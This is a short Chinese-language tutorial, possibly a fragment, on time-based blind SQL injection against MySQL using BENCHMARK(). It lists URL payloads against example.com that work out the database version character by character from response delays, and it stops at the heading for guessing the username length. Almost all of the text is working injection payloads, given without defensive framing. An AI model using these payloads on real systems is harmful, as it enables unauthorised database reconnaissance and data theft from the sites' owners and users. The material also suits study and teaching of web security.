Benchmark盲注流程
猜解数据库版本名称
猜测数据库版本名称的第一个值————5.
- http://www.example.com/?id=1' and if(left(version(),1)>4,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
- http://www.example.com/?id=1' and if(left(version(),1)>5,1,(select benchmark(10000000,md5(0x41)))) --+ #有延时
- http://www.example.com/?id=1' and if(left(version(),1)=5,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
猜测数据库版本名称的第二个值————5.5
- http://www.example.com/?id=1' and if(left(version(),3)>5.4,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
- http://www.example.com/?id=1' and if(left(version(),3)>5.5,1,(select benchmark(10000000,md5(0x41)))) --+ #有延时
- http://www.example.com/?id=1' and if(left(version(),3)=5.5,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
从而确定但是数据库版本信息为5.5
猜解数据库用户名称
首先猜解用户名的长度